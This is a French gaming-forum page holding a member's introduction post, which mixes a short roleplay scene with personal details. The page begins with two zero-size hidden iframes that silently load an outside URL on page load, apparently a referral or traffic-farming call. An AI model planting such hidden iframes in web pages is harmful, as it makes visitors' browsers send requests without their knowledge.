Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.



 
AccueilDernières imagesRechercherS'enregistrerConnexion
-28%
Le deal à ne pas rater :
Brandt LVE127J – Lave-vaisselle encastrable 12 couverts – L60cm
279.99 € 390.99 €
Voir le deal

 

 Présentation D-Roy

Aller en bas 
AuteurMessage
D-Roy




Messages : 1
Date d'inscription : 18/10/2010

Présentation D-Roy Empty
MessageSujet: Présentation D-Roy   Présentation D-Roy Icon_minitimeLun 18 Oct - 8:49

[Rp] Un vent Glacial soufle, la nuit tombe de plus en plus à l'approche de la Tanière. D-Roy, bien décidé à les rencontrer s'approche d'une caverne sombre ou des cris étranges en ressort. Sur le coups il se stoppa et réfléchit 5 secondes puis d'un élant décidé il mit son capuchon sur la tête, aluma une torche et entra dans la caverne ! Au détour de quelques crevasse et multiple stalagmite et stalactite luisante et brillante, comme si la glace possédait une essence, une âme, vivante qui parcourais l'intérieur d'elle. Puis il s'arreta net. Il n'en croyais pas ces yeux. Devant lui, là dans cette grotte, un Palais immense entièrement fait de glace bleuté et scintillante était construit dans la roche de la caverne. Un grand portail de fer recouvert de glace se dressais devant lui. Le derniers pas avant d'entrer dans l'antre des Pulsars.[/RP]

Bien le bonjour à vous ! Sa ressemble donc à sa le repère des Pulsar ! Assez froid, mais sa va bien ^^ Je suis Montagnard sa ne me gène pas xD Je pensais plus à quelque choses de cosmique ^^ en rapprochement avec les Pulsar, phénomène cosmique lorsque deux étoile rentre en collision pour fusionner. M'enfin, cessons ce bavardage inutile !

Je me présente, D-Roy, je suis l'un des Capitaines de L'Espada, mais aussi l'un des deutier de Chipeur. Cela fait déjà un bon moment que je commerce avec lui, je me suis donc décidé à passer sur votre forum afin de mieux vous connaitre.
Dans la vie je suis étudiant en licence Physique Chimie, je m'appelle Mathieu, et j'ai 20 ans. J'adore les Manga, et notament bleach Wink le sport, le cinéma et pas mal de truc du genre ^^ Voilà, si vous avez des questions n'hésiter pas !




Cordialement, D-Roy.
_______________________
Capitaine de l'Espada.
Revenir en haut Aller en bas
 
Présentation D-Roy
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» Présentation jmb
» Présentation de Nack ;)
» présentation de Mad sidious

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Les PulSar :: Partie Publique :: Présentation-
Sauter vers: